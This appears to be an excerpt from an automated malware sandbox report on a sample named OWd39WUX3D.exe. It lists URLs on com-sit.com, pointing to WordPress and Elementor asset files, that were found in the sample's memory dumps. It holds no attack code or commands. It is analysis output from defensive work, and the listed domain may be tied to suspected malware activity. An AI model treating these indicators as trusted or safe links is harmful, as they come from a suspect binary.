              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/mailpoet/assets/dist/js/public.js?ver=4.27.0
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/premium-addons-for-elementor/assets/frontend/min-js/headro
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/premium-addons-for-elementor/assets/frontend/min-js/lottie
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/premium-addons-for-elementor/assets/frontend/min-js/premiu
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor-child/ctc-style.css?ver=2.7.1.1683646291
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor/assets/js/hello-frontend.min.js?ver=1.0.0
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor/style.min.css?ver=2.8.1
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/themes/hello-elementor/theme.min.css?ver=2.8.1
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/custom-jet-blocks.css?ver=1.3.7
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/global.css?ver=1694601224
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-11.css?ver=1694601225
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-1395.css?ver=1694601225
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-42.css?ver=1694601225
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-46.css?ver=1694601226
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/uploads/elementor/css/post-6.css?ver=1694601224
